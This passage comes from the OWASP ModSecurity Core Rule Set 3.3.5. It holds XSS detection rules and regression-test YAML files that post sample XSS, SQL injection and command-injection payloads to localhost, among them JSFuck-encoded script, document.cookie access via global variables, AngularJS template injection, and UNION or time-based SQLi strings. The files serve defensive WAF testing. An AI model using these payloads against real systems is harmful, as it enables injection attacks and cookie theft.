%{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:b|&#x?0*(?:66|42|98|62);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \ "id:941220,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]" \ "id:941290,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'IE XSS Filters - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*[\xbe>]|<[^\xbe]*\xbe" \ "id:941310,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:lowercase,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ msg:'US-ASCII Malformed Encoding XSS Filter - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-tomcat',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # https://nedbatchelder.com/blog/200704/xss_with_utf7.html # UTF-7 encoding XSS filter evasion for IE. # Reported by Vladimir Ivanov # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \+ADw-.*(?:\+AD4-|>)|<.*\+AD4-" \ "id:941350,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:urlDecode,t:htmlEntityDecode,t:jsDecode,\ msg:'UTF-7 Encoding IE XSS - Attack Detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-internet-explorer',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Defend against JSFuck and Hieroglyphy obfuscation of Javascript code # # https://en.wikipedia.org/wiki/JSFuck # https://github.com/alcuadrado/hieroglyphy # # These JS obfuscations mostly aim for client side XSS exploits, hence the # integration of this rule into the XSS rule group. But serverside JS could # also be attacked via these techniques. # # Detection pattern / Core elements of JSFuck and Hieroglyphy are the # following two items: # !![] # !+[] # # ModSecurity always transforms "+" into " " with query strings and the # URLENCODE body processor (but not for JSON). So we need to check for # the following patterns: # !![] # !+[] # ! [] SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ![!+ ]\[\]" \ "id:941360,\ phase:2,\ block,\ capture,\ t:none,\ msg:'JSFuck / Hieroglyphy obfuscation detected',\ logdata:'Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # Prevent 941180 bypass by using JavaScript global variables # Refer to: https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ # # Examples: # - /?search=/?a=";+alert(self["document"]["cookie"]);// # - /?search=/?a=";+document+/*foo*/+.+/*bar*/+cookie;// # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?:self|document|this|top|window)\s*(?:/\*|[\[)]).+?(?:\]|\*/)" \ "id:941370,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:compressWhitespace,\ msg:'JavaScript global variable found',\ logdata:'Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'attack-xss',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" # # -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) # # # This is a stricter sibling of rule 941100. # SecRule REQUEST_HEADERS:Referer "@detectXSS" \ "id:941101,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Attack Detected via libinjection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # -=[ XSS Filters - Category 5 ]=- # HTML attributes - src, style and href # SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:s(?:tyle|rc)|href)\b[\s\S]*?=" \ "id:941150,\ phase:2,\ block,\ capture,\ t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ msg:'XSS Filter - Category 5: Disallowed HTML Attributes',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ tag:'attack-xss',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'paranoia-level/2',\ ctl:auditLogParts=+E,\ ver:'OWASP_CRS/3.3.5',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # Detect tags that are the most common direct HTML injection points. # # # # # " output: log_contains: id "941330" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml000066400000000000000000000016541446122515100276250ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 941340.yaml tests: - test_title: 941340-1 desc: "IE XSS Filters - Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=' infoo.bar=&var2=whatever" version: HTTP/1.0 output: log_contains: id "941340" - test_title: 941340-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "payload=XSS" version: HTTP/1.0 output: log_contains: id "941340" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml000066400000000000000000000007761446122515100276320ustar00rootroot00000000000000--- meta: author: fgsch enabled: true name: 941350.yaml description: Test rule 941350 tests: - test_title: 941350-1 desc: GH issue 1514 stages: - stage: input: dest_addr: 127.0.0.1 method: GET port: 80 uri: /xx?id=%25252bADw-script%25252bAD4- headers: Accept: "*/*" Host: localhost User-Agent: ModSecurity CRS 3 Tests output: log_contains: id "941350" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml000066400000000000000000000051401446122515100276210ustar00rootroot00000000000000--- meta: author: "Christian Folini" description: None enabled: true name: 941360.yaml tests: - test_title: 941360-1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" # Payload represents "alert(1)" in JSFuck encoding version: HTTP/1.1 output: log_contains: id "941360" - test_title: 941360-2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "a=(![]+[])[+!+[]]" # Payload represents "a" in JSFuck / Hieroglyphy encoding version: HTTP/1.1 output: log_contains: id "941360" - test_title: 941360-3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "a=+!![]" # Payload represents "1" in JSFuck / Hieroglyphy encoding version: HTTP/1.1 output: log_contains: id "941360" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml000066400000000000000000000106701446122515100276260ustar00rootroot00000000000000--- meta: author: "Andrea Menin" description: None enabled: true name: 941370.yaml tests: - test_title: 941370-1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-2 desc: "Bypass using comments in syntax" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-3 desc: "Bypass using JavaScript global variables" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=self%5B%22%5Cx24%22%5D" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=%28document%29%5B%22cookie%22%5D" version: HTTP/1.1 output: log_contains: id "941370" - test_title: 941370-10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 data: "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" version: HTTP/1.1 output: log_contains: id "941370" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml000066400000000000000000000012731446122515100276260ustar00rootroot00000000000000--- meta: author: "Franziska Buehler" description: None enabled: true name: 941380.yaml tests: - test_title: 941380-1 desc: "AngularJS client side template injection detection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost Accept: "*/*" User-Agent: "ModSecurity CRS 3 Tests" method: GET port: 80 uri: '/login?user=%20x%20%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D%20.%20ff' # /login?user={{constructor.constructor('alert(1)')()}} version: HTTP/1.1 output: log_contains: id "941380" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/000077500000000000000000000000001446122515100262635ustar00rootroot00000000000000modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml000066400000000000000000000132611446122515100277110ustar00rootroot00000000000000--- meta: author: "Christian Folini" description: Various SQL injection tests enabled: true name: 942100.yaml tests: - test_title: 942100-1 desc: "Simple SQL Injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=1234 OR 1=1" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-2 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=-1839' or '1'='1" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-3 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=-1839\" or \"1\"=\"2" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-4 desc: "Basic SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-5 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=EmptyValue' and 526=527" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-6 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=foo') UNION ALL select NULL --" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-7 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-8 desc: "Simple SQL Injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-9 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-10 desc: "Advanced SQL Injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "1'||(select extractvalue(xmltype('%toyop;" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-11 desc: "Simple function call" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=sleep(20)" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-12 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-13 desc: "Advanced injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\" | type %SystemDrive%\\\\config.ini | \"" version: HTTP/1.0 output: log_contains: id "942100" - test_title: 942100-14 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" version: HTTP/1.0 output: log_contains: id "942100" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml000066400000000000000000000044241446122515100277130ustar00rootroot00000000000000--- meta: author: "Christian Folini" description: Various SQL injection tests enabled: true name: 942101.yaml tests: - test_title: 942101-1 desc: "Simple SQL Injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/1234%20OR%201=1" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-2 desc: "Basic SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/2010-01-01'+sleep(20.to_i)+'" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-3 desc: "Simple SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/EmptyValue'%20and%20526=527" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-4 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/foo')waitfor%20delay'5%3a0%3a20'--" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-5 desc: "Simple function call" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/sleep(20)" version: HTTP/1.0 output: log_contains: id "942101" - test_title: 942101-6 desc: "Advanced SQL injection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" version: HTTP/1.0 output: log_contains: id "942101" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml000066400000000000000000000007751446122515100277200ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942110.yaml tests: - test_title: 942110-1 desc: "Common SQL Injection Testing" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 # NB: false positives: /?var=\'\' data: "var=%27%27" version: HTTP/1.0 output: log_contains: id "942110" modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml000066400000000000000000000206751446122515100277220ustar00rootroot00000000000000--- meta: author: "Christian S.J. Peron, Christoph Hansen" description: None enabled: true name: 942120.yaml tests: - test_title: 942120-1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=blahblah&var2=LIKE%20NULL" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=RegExp" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ">>" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=%26%26" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "<<" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "%21%3D" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "||" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "XOR" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=%3C%3D" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "IS NULL" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "in (0,1)" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "in (2147483647,-1)" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=%3C%3D%3E" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "regexp" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "RLIKE" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-16 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "<>" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-18 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "+IN+%28815914%2C+815913%29%0A" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay= in ( Aa,- Ab-, and Ac)" version: HTTP/1.0 output: log_contains: id "942120" - test_title: 942120-21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "%3E%3D" version: HTTP/1.0 output: log_contains: id "942120" 